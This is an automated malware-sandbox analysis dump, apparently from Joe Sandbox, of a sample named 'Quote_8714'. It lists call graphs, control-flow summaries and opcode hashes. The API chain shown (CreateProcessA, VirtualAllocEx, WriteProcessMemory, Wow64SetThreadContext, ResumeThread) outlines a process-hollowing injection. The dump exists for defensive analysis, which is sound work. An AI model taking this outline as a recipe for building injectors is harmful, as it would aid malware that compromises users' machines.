63588->63590 63589 723fe57 63589->63583 63590->63589 63593 bca0269 63590->63593 63597 bca0040 63590->63597 63595 bca0224 63593->63595 63594 bca0262 63594->63589 63595->63594 63601 bca0618 63595->63601 63599 bca0063 63597->63599 63598 bca0262 63598->63589 63599->63598 63600 bca0618 2 API calls 63599->63600 63600->63598 63602 bca064f 63601->63602 63606 bca09eb 63602->63606 63611 bca09c7 63602->63611 63603 bca0673 63607 bca09fe 63606->63607 63616 bca0c28 PostMessageW 63607->63616 63618 bca0c21 PostMessageW 63607->63618 63608 bca0a21 63608->63603 63612 bca09ec 63611->63612 63613 bca09cd 63611->63613 63614 bca0c28 PostMessageW 63612->63614 63615 bca0c21 PostMessageW 63612->63615 63613->63603 63614->63613 63615->63613 63617 bca0c94 63616->63617 63617->63608 63619 bca0c94 63618->63619 63619->63608 63797 b2639f0 63798 b2639ff 63797->63798 63799 b263a1e 63798->63799 63802 b263af0 63798->63802 63806 b263ae1 63798->63806 63803 b263afe 63802->63803 63804 b263b09 KiUserCallbackDispatcher 63803->63804 63805 b263b12 63803->63805 63804->63805 63805->63799 63807 b263af0 63806->63807 63808 b263b09 KiUserCallbackDispatcher 63807->63808 63809 b263b12 63807->63809 63808->63809 63809->63799 63620 4f276c8 63621 4f276e0 63620->63621 63635 4f2740c 63621->63635 63623 4f27739 63643 4f2741c 63623->63643 63625 4f2775d 63647 4f2742c 63625->63647 63627 4f2777b 63629 4f27b18 63627->63629 63651 1068439 63627->63651 63660 1065c7c 63627->63660 63669 106874b 63627->63669 63678 1068430 63627->63678 63687 1068741 63627->63687 63628 4f281e6 63636 4f27417 63635->63636 63638 1068430 6 API calls 63636->63638 63639 1068741 6 API calls 63636->63639 63640 1065c7c 6 API calls 63636->63640 63641 106874b 6 API calls 63636->63641 63642 1068439 6 API calls 63636->63642 63637 4f281e6 63637->63623 63638->63637 63639->63637 63640->63637 63641->63637 63642->63637 63644 4f27427 63643->63644 63646 4f2862e 63644->63646 63695 4f2763c 63644->63695 63646->63625 63648 4f27437 63647->63648 63649 4f2763c 6 API calls 63648->63649 63650 4f2868e 63649->63650 63650->63627 63652 106846b 63651->63652 63653 1068498 63652->63653 63656 106874b 6 API calls 63652->63656 63655 10686f3 63653->63655 63713 106ada0 63653->63713 63654 1068731 63654->63628 63655->63654 63718 106ce90 63655->63718 63723 106ce8f 63655->63723 63656->63653 63661 1065c87 63660->63661 63662 1068498 63661->63662 63668 106874b 6 API calls 63661->63668 63664 10686f3 63662->63664 63667 106ada0 2 API calls 63662->63667 63663 1068731 63663->63628 63664->63663 63665 106ce90 6 API calls 63664->63665 63666 106ce8f 6 API calls 63664->63666 63665->63663 63666->63663 63667->63664 63668->63662 63670 10686c8 63669->63670 63674 106874f 63669->63674 63671 1068746 63670->63671 63672 10686f3 63670->63672 63675 106ada0 2 API calls 63670->63675 63671->63671 63673 1068731 63672->63673 63676 106ce90 6 API calls 63672->63676 63677 106ce8f 6 API calls 63672->63677 63673->63628 63674->63628 63675->63672 63676->63673 63677->63673 63679 106843b 63678->63679 63680 1068498 63679->63680 63686 106874b 6 API calls 63679->63686 63682 10686f3 63680->63682 63683 106ada0 2 API calls 63680->63683 63681 1068731 63681->63628 63682->63681 63684 106ce90 6 API calls 63682->63684 63685 106ce8f 6 API calls 63682->63685 63683->63682 63684->63681 63685->63681 63686->63680 63688 1068746 63687->63688 63689 10686c8 63687->63689 63688->63688 63691 10686f3 63689->63691 63692 106ada0 2 API calls 63689->63692 63690 1068731 63690->63628 63691->63690 63693 106ce90 6 API calls 63691->63693 63694 106ce8f 6 API calls 63691->63694 63692->63691 63693->63690 63694->63690 63696 4f27647 63695->63696 63701 1067250 63696->63701 63705 1067258 63696->63705 63709 1065c4c 63696->63709 63697 4f28c84 63697->63646 63702 106725b 63701->63702 63703 1065c7c 6 API calls 63702->63703 63704 1067305 63703->63704 63704->63697 63706 1067260 63705->63706 63707 1065c7c 6 API calls 63706->63707 63708 1067305 63707->63708 63708->63697 63710 1065c57 63709->63710 63711 1065c7c 6 API calls 63710->63711 63712 1067305 63711->63712 63712->63697 63728 106add7 63713->63728 63732 106adc9 63713->63732 63737 106add8 63713->63737 63714 106adb6 63714->63655 63719 106ceb1 63718->63719 63720 106ced5 63719->63720 63751 106d040 63719->63751 63755 106d03f 63719->63755 63720->63654 63724 106ceb1 63723->63724 63725 106ced5 63724->63725 63726 106d040 6 API calls 63724->63726 63727 106d03f 6 API calls 63724->63727 63725->63654 63726->63725 63727->63725 63729 106ade7 63728->63729 63741 106aed0 63728->63741 63746 106aecf 63728->63746 63729->63714 63733 106add3 63732->63733 63735 106aed0 GetModuleHandleW 63733->63735 63736 106aecf GetModuleHandleW 63733->63736 63734 106ade7 63734->63714 63735->63734 63736->63734 63739 106aed0 GetModuleHandleW 63737->63739 63740 106aecf GetModuleHandleW 63737->63740 63738 106ade7 63738->63714 63739->63738 63740->63738 63742 106aee1 63741->63742 63743 106af04 63741->63743 63742->63743 63744 106b108 GetModuleHandleW 63742->63744 63743->63729 63745 106b135 63744->63745 63745->63729 63747 106af04 63746->63747 63748 106aee1 63746->63748 63747->63729 63748->63747 63749 106b108 GetModuleHandleW 63748->63749 63750 106b135 63749->63750 63750->63729 63752 106d04d 63751->63752 63753 106d087 63752->63753 63759 106c978 63752->63759 63753->63720 63756 106d04d 63755->63756 63757 106c978 6 API calls 63756->63757 63758 106d087 63756->63758 63757->63758 63758->63720 63760 106c983 63759->63760 63762 106d998 63760->63762 63763 106caa4 63760->63763 63762->63762 63764 106caaf 63763->63764 63765 1065c7c 6 API calls 63764->63765 63766 106da07 63765->63766 63774 106de88 63766->63774 63781 1069d3f 63766->63781 63767 106da16 63768 106cab4 PostMessageW PostMessageW 63767->63768 63769 106da30 63768->63769 63770 106cac4 PostMessageW PostMessageW 63769->63770 63771 106da37 63770->63771 63771->63762 63775 106de94 63774->63775 63776 106df87 63775->63776 63777 106def7 63775->63777 63780 106dff3 63775->63780 63778 106cac4 2 API calls 63776->63778 63776->63780 63779 106df82 KiUserCallbackDispatcher 63777->63779 63777->63780 63778->63780 63779->63780 63782 1069d4b 63781->63782 63783 106df87 63782->63783 63785 106dff3 63782->63785 63786 106def7 63782->63786 63784 106cac4 2 API calls 63783->63784 63783->63785 63784->63785 63786->63785 63787 106df82 KiUserCallbackDispatcher 63786->63787 63787->63785 63790 bca6680 DispatchMessageW 63791 bca66ec 63790->63791 63810 4f2a1a8 63811 4f2a1d1 63810->63811 63812 4f2a2d6 63811->63812 63815 4f2a660 63811->63815 63820 4f2a630 63811->63820 63817 4f2a684 63815->63817 63816 4f2a75a 63816->63812 63817->63816 63825 4f2ac88 63817->63825 63830 4f2ac78 63817->63830 63822 4f2a639 63820->63822 63821 4f2a75a 63821->63812 63822->63821 63823 4f2ac88 KiUserCallbackDispatcher 63822->63823 63824 4f2ac78 KiUserCallbackDispatcher 63822->63824 63823->63821 63824->63821 63826 4f2aca3 63825->63826 63835 4f2ae53 63825->63835 63839 4f2aca9 63825->63839 63843 4f2acb8 63825->63843 63826->63816 63831 4f2aca3 63830->63831 63832 4f2ae53 KiUserCallbackDispatcher 63830->63832 63833 4f2acb8 KiUserCallbackDispatcher 63830->63833 63834 4f2aca9 KiUserCallbackDispatcher 63830->63834 63831->63816 63832->63831 63833->63831 63834->63831 63836 4f2ae19 63835->63836 63847 4f2bdc0 63836->63847 63841 4f2acb8 63839->63841 63840 4f2ae40 63840->63826 63842 4f2bdc0 KiUserCallbackDispatcher 63841->63842 63842->63840 63845 4f2acf2 63843->63845 63844 4f2ae40 63844->63826 63846 4f2bdc0 KiUserCallbackDispatcher 63845->63846 63846->63844 63849 4f2bdc8 63847->63849 63848 4f2be9e 63849->63848 63850 4f2bf29 KiUserCallbackDispatcher 63849->63850 63850->63848 63851 106d158 63852 106d19e 63851->63852 63855 106d338 63852->63855 63858 106ca40 63855->63858 63859 106d3a0 DuplicateHandle 63858->63859 63860 106d28b 63859->63860 63927 b268e48 63928 b268e62 63927->63928 63931 b269139 63928->63931 63932 b269155 63931->63932 63950 b269440 63932->63950 63957 b2693c2 63932->63957 63962 b2694a7 63932->63962 63965 b269ab8 63932->63965 63970 b26975a 63932->63970 63974 b26949c 63932->63974 63978 b26951f 63932->63978 63983 b2692fe 63932->63983 63988 b2696f1 63932->63988 63991 b269797 63932->63991 63996 b2695cb 63932->63996 64000 b2697aa 63932->64000 64004 b26922d 63932->64004 64009 b26932c 63932->64009 64016 b26940e 63932->64016 64020 b269800 63932->64020 63933 b268e86 63951 b269462 63950->63951 64028 723c798 63951->64028 63952 b269dd5 63952->63933 63953 b269267 63953->63952 64024 723cff0 63953->64024 64032 723beb0 63953->64032 63959 b269267 63957->63959 63958 b269dd5 63958->63933 63959->63958 63960 723cff0 CreateProcessA 63959->63960 63961 723beb0 ResumeThread 63959->63961 63960->63959 63961->63959 64036 723cd68 63962->64036 63967 b269267 63965->63967 63966 b269dd5 63966->63933 63967->63965 63967->63966 63968 723cff0 CreateProcessA 63967->63968 63969 723beb0 ResumeThread 63967->63969 63968->63967 63969->63967 63971 b26976e 63970->63971 63973 723cd68 WriteProcessMemory 63971->63973 63972 b269b9c 63973->63972 63975 b269c5d 63974->63975 64040 723cca8 63975->64040 63980 b269267 63978->63980 63979 b269dd5 63979->63933 63980->63979 63981 723beb0 ResumeThread 63980->63981 63982 723cff0 CreateProcessA 63980->63982 63981->63980 63982->63980 63984 b269267 63983->63984 63985 b269dd5 63984->63985 63986 723cff0 CreateProcessA 63984->63986 63987 723beb0 ResumeThread 63984->63987 63985->63933 63986->63984 63987->63984 64044 723ce58 63988->64044 63992 b2695e9 63991->63992 63993 b2697d6 63992->63993 63995 723cd68 WriteProcessMemory 63992->63995 63993->63933 63994 b26960a 63994->63933 63995->63994 63997 b2695d1 63996->63997 63999 723cd68 WriteProcessMemory 63997->63999 63998 b26960a 63998->63933 63999->63998 64001 b2697b3 64000->64001 64002 b2696ad 64001->64002 64003 723c798 Wow64SetThreadContext 64001->64003 64002->63933 64003->64002 64006 b269251 64004->64006 64005 b269dd5 64005->63933 64006->64005 64007 723beb0 ResumeThread 64006->64007 64008 723cff0 CreateProcessA 64006->64008 64007->64006 64008->64006 64010 b269332 64009->64010 64015 723cff0 CreateProcessA 64010->64015 64011 b269267 64012 b269dd5 64011->64012 64013 723beb0 ResumeThread 64011->64013 64014 723cff0 CreateProcessA 64011->64014 64012->63933 64013->64011 64014->64011 64015->64011 64017 b26976e 64016->64017 64019 723cd68 WriteProcessMemory 64017->64019 64018 b269b9c 64019->64018 64021 b269801 64020->64021 64023 723c798 Wow64SetThreadContext 64021->64023 64022 b2696ad 64022->63933 64023->64022 64025 723d079 64024->64025 64025->64025 64026 723d1de CreateProcessA 64025->64026 64027 723d23b 64026->64027 64029 723c7dd Wow64SetThreadContext 64028->64029 64031 723c825 64029->64031 64031->63953 64033 723bef0 ResumeThread 64032->64033 64035 723bf21 64033->64035 64035->63953 64037 723cdb0 WriteProcessMemory 64036->64037 64039 723ce07 64037->64039 64039->63933 64041 723cce8 VirtualAllocEx 64040->64041 64043 723cd25 64041->64043 64045 723cea3 ReadProcessMemory 64044->64045 64047 723cee7 64045->64047 64047->63933 64048 1064668 64049 1064672 64048->64049 64053 1064767 64048->64053 64058 1063e1c 64049->64058 64051 106468d 64054 106477d 64053->64054 64062 1064867 64054->64062 64066 1064868 64054->64066 64059 1063e27 64058->64059 64074 1065bfc 64059->64074 64061 1066f90 64061->64051 64064 106488f 64062->64064 64063 106496c 64064->64063 64070 106449c 64064->64070 64068 106488f 64066->64068 64067 106496c 64067->64067 64068->64067 64069 106449c CreateActCtxA 64068->64069 64069->64067 64071 10658f8 CreateActCtxA 64070->64071 64073 10659bb 64071->64073 64075 1065c07 64074->64075 64078 1065c1c 64075->64078 64077 106712d 64077->64061 64079 1065c27 64078->64079 64080 1065c4c 6 API calls 64079->64080 64081 1067202 64080->64081 64081->64077

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ($($($)$)$)$)$)$.$4'^q$HUi
                                                                                                      • API String ID: 0-3485644114
                                                                                                      • Opcode ID: 0d099541b0f6c599eb3df6a3767e4187d3c6f04e17de53b4aafb26eca55a3ef5
                                                                                                      • Instruction ID: d397331da70c584ca4a98fc23d6ffb6511e75dfca5b5c8c7fdfac56cd2512cfb
                                                                                                      • Opcode Fuzzy Hash: 0d099541b0f6c599eb3df6a3767e4187d3c6f04e17de53b4aafb26eca55a3ef5
                                                                                                      • Instruction Fuzzy Hash: 17626E30A00715CFD704EF74C994B9AB7B2FF89304F1486A9D8096F365DB75A98ACB90

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1030 4f276b8-4f27726 1038 4f27730-4f27734 call 4f2740c 1030->1038 1040 4f27739-4f27768 call 4f2741c 1038->1040 1046 4f27772-4f27776 call 4f2742c 1040->1046 1048 4f2777b-4f2781c call 4f2743c * 5 1046->1048 1070 4f27826-4f2782a call 4f2744c 1048->1070 1072 4f2782f-4f27847 1070->1072 1075 4f2784e-4f2785b 1072->1075 1076 4f27861-4f27889 call 4f2745c 1075->1076 1079 4f2788e-4f278a7 call 4f2746c 1076->1079 1082 4f278ac-4f279a6 call 4f2747c call 4f2748c call 4f2749c call 4f274ac call 4f274bc 1079->1082 1095 4f279ab-4f279ca call 4f274cc 1082->1095 1098 4f279cf-4f27a2c call 4f274dc 1095->1098 1106 4f27a37-4f27a3e 1098->1106 1107 4f27a4a-4f27ad1 1106->1107 1115 4f27ad8-4f27af2 1107->1115 1116 4f27af8-4f27afa 1115->1116 1117 4f27b04-4f27b08 1116->1117 1118 4f27b0e-4f27b12 1117->1118 1119 4f2814b-4f281d2 1118->1119 1120 4f27b18-4f27bdd call 4f274ec 1118->1120 1124 4f281da-4f281dc 1119->1124 1140 4f27be7-4f27c20 call 4f2747c 1120->1140 1229 4f281e1 call 1068430 1124->1229 1230 4f281e1 call 1068741 1124->1230 1231 4f281e1 call 1065c7c 1124->1231 1232 4f281e1 call 106874b 1124->1232 1233 4f281e1 call 1068439 1124->1233 1126 4f281e6-4f28223 call 4f275fc call 4f2760c 1143 4f27c25-4f27cd9 call 4f2749c call 4f274fc call 4f274ac call 4f2750c call 4f274bc 1140->1143 1154 4f27cde-4f27cec 1143->1154 1155 4f27cf1-4f27f0a call 4f2751c * 5 call 4f2752c call 4f2753c call 4f2751c 1154->1155 1182 4f27f0f-4f27f4a 1155->1182 1183 4f27f50-4f27f87 call 4f2754c 1182->1183 1186 4f27f8c-4f27fe1 call 4f2755c call 4f2756c 1183->1186 1190 4f27fe6-4f27fe8 call 4f2757c 1186->1190 1192 4f27fed-4f27ff7 1190->1192 1193 4f27ffd-4f27fff call 4f2757c 1192->1193 1195 4f28004-4f2801b call 4f2758c 1193->1195 1198 4f28020-4f28036 1195->1198 1200 4f28038-4f2803e 1198->1200 1201 4f2804e-4f28110 call 4f2759c call 4f275ac call 4f275bc call 4f275cc call 4f275dc call 4f2749c call 4f2577c 1198->1201 1202 4f28042-4f28044 1200->1202 1203 4f28040 1200->1203 1222 4f28117-4f2811f 1201->1222 1202->1201 1203->1201 1234 4f28121 call 4f2c207 1222->1234 1235 4f28121 call 4f2c218 1222->1235 1223 4f28126-4f28135 call 4f275ec 1236 4f28137 call 4f2c207 1223->1236 1237 4f28137 call 4f2c218 1223->1237 1226 4f2813c-4f2813e call 4f275ec 1228 4f28143-4f2814a 1226->1228 1229->1126 1230->1126 1231->1126 1232->1126 1233->1126 1234->1223 1235->1223 1236->1226 1237->1226
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ($($($)$)$)$)$)$.$4'^q$HUi
                                                                                                      • API String ID: 0-3485644114
                                                                                                      • Opcode ID: 92257a26ff4d80d5c5cd2b48426a3822a31b8ddbc6c06426542f7dc397dc8977
                                                                                                      • Instruction ID: 7fefde6ffa7239cc3d5366dc102d57abcf2fc9e7492de3886fb6aed1670db167
                                                                                                      • Opcode Fuzzy Hash: 92257a26ff4d80d5c5cd2b48426a3822a31b8ddbc6c06426542f7dc397dc8977
                                                                                                      • Instruction Fuzzy Hash: A8526C30A00715CFDB04EF74C994A99B7B2FF89304F1586B8D8096F365DB75A98ACB90
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1756959929.000000000B260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B260000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_b260000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Hbq
                                                                                                      • API String ID: 0-1245868
                                                                                                      • Opcode ID: ea9d02bf2053927ff4f1234dd1826c9923f6d2e9aba0e36d4117d26e73bbaa41
                                                                                                      • Instruction ID: c8337ca813ae18c6b3b711e01832b650aaa56b16da6d7ba22cb9aa607e658958
                                                                                                      • Opcode Fuzzy Hash: ea9d02bf2053927ff4f1234dd1826c9923f6d2e9aba0e36d4117d26e73bbaa41
                                                                                                      • Instruction Fuzzy Hash: F5E1DB707016028FDB1AEB79D4A07AEB7EAAFC8644F14446DC58A9B3A0CF34ED41CB51
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1171c716bc60d74b8db7dc5eba8357bab2208db76429bd7969c0562ec598fb76
                                                                                                      • Instruction ID: 777a9648ccae16837a52b9014d1f2675be0841cd9cb7b3bdd417bdb53102930d
                                                                                                      • Opcode Fuzzy Hash: 1171c716bc60d74b8db7dc5eba8357bab2208db76429bd7969c0562ec598fb76
                                                                                                      • Instruction Fuzzy Hash: 0442D534711200CFD7589B78C59866D7BB2BF89305B2148BDE646DB3B4DB36A882CF54
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 725cba5cf185e7e6559bc9d520ec9347b703fec27598bb648b2419e0d475107e
                                                                                                      • Instruction ID: 4dbeaaa84d147821a968ca8a4c0c61803ff02f84131d82ae8ebc2b3f74f16c4b
                                                                                                      • Opcode Fuzzy Hash: 725cba5cf185e7e6559bc9d520ec9347b703fec27598bb648b2419e0d475107e
                                                                                                      • Instruction Fuzzy Hash: 64526B3591161ACFCB21DF65CC44AE9B7B1FF49304F1485E9E549AB261EB31EA82CF40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1756959929.000000000B260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B260000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_b260000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3f9794f743becccd0d8bcd63ffd3c990d668d1c38a79aae5aef8713a4dbaaf4b
                                                                                                      • Instruction ID: 6c7bcbfb28d5bf1181affe6ff0dc6c6348e9fcc6d01dc6450d80d12bad2c593e
                                                                                                      • Opcode Fuzzy Hash: 3f9794f743becccd0d8bcd63ffd3c990d668d1c38a79aae5aef8713a4dbaaf4b
                                                                                                      • Instruction Fuzzy Hash: 2532393591061ACFDB21DF64C984BDAB7B1FF89304F1085E9E509AB261EB70AAC5DF40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3d88d62c0318303a73a3f6417eca2d0b20d0dee9dcdd59dbb62f3823ac665a6f
                                                                                                      • Instruction ID: 9ae87bb02c6b4c1585017ab7eb99990210c6a7cc3a741fd19058d992b2553eaa
                                                                                                      • Opcode Fuzzy Hash: 3d88d62c0318303a73a3f6417eca2d0b20d0dee9dcdd59dbb62f3823ac665a6f
                                                                                                      • Instruction Fuzzy Hash: 73E16B70E1020ACFDB14DFA9D988BADBBF1BF58308F15C169E405AF2A5DB74A945CB40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 83c18307bc50e5ec0b02d9ee81cde26822162f7bf0c6631f3112f792d178de76
                                                                                                      • Instruction ID: 6097c6f54e5eb8dfca3595293d42941f34d8ba9ab3f6a265705d98a9321cf345
                                                                                                      • Opcode Fuzzy Hash: 83c18307bc50e5ec0b02d9ee81cde26822162f7bf0c6631f3112f792d178de76
                                                                                                      • Instruction Fuzzy Hash: 43612935E0032ADFDB04EFA0CA509DEBBF6FF89304B645165D409AB264EB30AD46CB50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e7ba9a7a1e617edb1771d0dab76367c813758c9136fb7e9a18d21143d88313ae
                                                                                                      • Instruction ID: 06c0ba220cec5828cd505226e40936b843a933f503223000c2c39b9929369a7d
                                                                                                      • Opcode Fuzzy Hash: e7ba9a7a1e617edb1771d0dab76367c813758c9136fb7e9a18d21143d88313ae
                                                                                                      • Instruction Fuzzy Hash: 4921F5B0D146189BEB28CFAAC9447DEBEF6AFC9300F14C06AD40866254DB75094A8F90

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1297 4fff920-4fff958 1299 4fff95a-4fff965 1297->1299 1300 4fff9a4-4fff9a8 1297->1300 1303 4fff96b-4fff971 1299->1303 1304 4fffa99-4fffac5 1299->1304 1301 4fff9ae-4fff9b0 1300->1301 1302 4fff9aa-4fff9ac 1300->1302 1305 4fff9b3-4fff9b7 1301->1305 1302->1305 1306 4fffacc-4fffb28 1303->1306 1307 4fff977-4fff979 1303->1307 1304->1306 1309 4fff9b9-4fff9bb 1305->1309 1310 4fff9e2-4fff9e4 1305->1310 1345 4fffc7e-4fffc82 1306->1345 1346 4fffb2e-4fffb76 1306->1346 1307->1306 1311 4fff97f-4fff982 1307->1311 1317 4fff9bd-4fff9bf 1309->1317 1318 4fff9c1 1309->1318 1315 4fffa6b-4fffa6f 1310->1315 1316 4fff9ea-4fffa1b 1310->1316 1312 4fff988 1311->1312 1313 4fff984-4fff986 1311->1313 1321 4fff98d-4fff993 1312->1321 1313->1321 1319 4fffa78 1315->1319 1320 4fffa71-4fffa76 1315->1320 1330 4fffa1d-4fffa20 1316->1330 1331 4fffa22-4fffa24 1316->1331 1323 4fff9c6-4fff9e1 1317->1323 1318->1323 1324 4fffa7b-4fffa98 1319->1324 1320->1324 1325 4fff99a 1321->1325 1326 4fff995-4fff998 1321->1326 1329 4fff99f-4fff9a2 1325->1329 1326->1329 1329->1305 1330->1331 1336 4fffa2d 1331->1336 1337 4fffa26-4fffa2b 1331->1337 1338 4fffa2f-4fffa3c 1336->1338 1337->1338 1341 4fffa44-4fffa46 1338->1341 1343 4fffa48-4fffa61 1341->1343 1344 4fffa63-4fffa6a 1341->1344 1343->1344 1347 4fffc8f-4fffca2 1345->1347 1348 4fffc84-4fffc8e 1345->1348 1355 4fffb7c-4fffb95 1346->1355 1356 4fffc3b-4fffc3f 1346->1356 1364 4fffb9f-4fffbad 1355->1364 1365 4fffb97-4fffb9a 1355->1365 1357 4fffc6d-4fffc70 1356->1357 1358 4fffc41-4fffc6b 1356->1358 1361 4fffc78-4fffc7b 1357->1361 1358->1361 1361->1345 1369 4fffbaf-4fffbb9 1364->1369 1370 4fffbbb 1364->1370 1366 4fffc28-4fffc35 1365->1366 1366->1355 1366->1356 1372 4fffbbd-4fffbbf 1369->1372 1370->1372 1373 4fffbc4-4fffbe8 1372->1373 1374 4fffbc1 1372->1374 1376 4fffbea-4fffbf4 1373->1376 1377 4fffbf6 1373->1377 1374->1373 1378 4fffbf8-4fffbfa 1376->1378 1377->1378 1378->1366 1379 4fffbfc-4fffc09 1378->1379 1380 4fffc0d 1379->1380 1381 4fffc0b 1379->1381 1382 4fffc0f-4fffc1f 1380->1382 1381->1382 1383 4fffc23 1382->1383 1384 4fffc21 1382->1384 1385 4fffc25 1383->1385 1384->1385 1385->1366
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Hbq$Hbq
                                                                                                      • API String ID: 0-4258043069
                                                                                                      • Opcode ID: 3af4e13f3ecb1a251f83d82fb8aaea7564dd246c20d2e837d13fe061cb02d009
                                                                                                      • Instruction ID: d48000d87a90182296b43f3f48671d07e762abbf23142901219a6795e7c75dcc
                                                                                                      • Opcode Fuzzy Hash: 3af4e13f3ecb1a251f83d82fb8aaea7564dd246c20d2e837d13fe061cb02d009
                                                                                                      • Instruction Fuzzy Hash: BEC19F31B006169FCB14DF69C9845AEBBF2FF88314F10456AD605E3760EB34E956CBA1

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1386 4ff2ef0-4ff3d52 1389 4ff3d5b-4ff3d6b 1386->1389 1390 4ff3d54-4ff3e2f 1386->1390 1392 4ff3e36-4ff3f08 1389->1392 1393 4ff3d71-4ff3d81 1389->1393 1390->1392 1412 4ff3f0f 1392->1412 1393->1392 1394 4ff3d87-4ff3d8b 1393->1394 1396 4ff3d8d 1394->1396 1397 4ff3d93-4ff3db2 1394->1397 1396->1392 1396->1397 1399 4ff3dd9-4ff3dde 1397->1399 1400 4ff3db4-4ff3dd4 call 4ff3054 call 4ff2ed0 call 4ff2ee0 1397->1400 1401 4ff3de7-4ff3dfa call 4ff2eac 1399->1401 1402 4ff3de0-4ff3de2 call 4ff3064 1399->1402 1400->1399 1401->1412 1413 4ff3e00-4ff3e07 1401->1413 1402->1401 1418 4ff3f14-4ff3f21 1412->1418 1422 4ff3f23-4ff3f3c 1418->1422 1426 4ff3f3e-4ff3f44 1422->1426 1427 4ff3f65-4ff3f67 1422->1427 1429 4ff3f4c-4ff3f62 call 4ff3074 1426->1429 1431 4ff3f68-4ff3f6b 1427->1431 1433 4ff3f6c-4ff3f71 1431->1433 1436 4ff3f64 1433->1436 1437 4ff3f73-4ff3f75 1433->1437 1436->1427 1437->1431 1438 4ff3f77-4ff3f79 1437->1438 1438->1433 1440 4ff3f7b 1438->1440 1441 4ff3f7c-4ff3f7d 1440->1441 1441->1441 1443 4ff3f7f-4ff3fa3 1441->1443 1444 4ff3fac-4ff3fbe 1443->1444 1445 4ff3fa5-4ff3fab 1443->1445 1447 4ff3fc5-4ff3fda 1444->1447 1448 4ff3fc0 1444->1448 1451 4ff3fdc-4ff3fe1 1447->1451 1452 4ff3fe4-4ff4008 1447->1452 1448->1447 1451->1452 1455 4ff400a 1452->1455 1456 4ff4012 1452->1456 1455->1456
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (bq$Hbq
                                                                                                      • API String ID: 0-4081012451
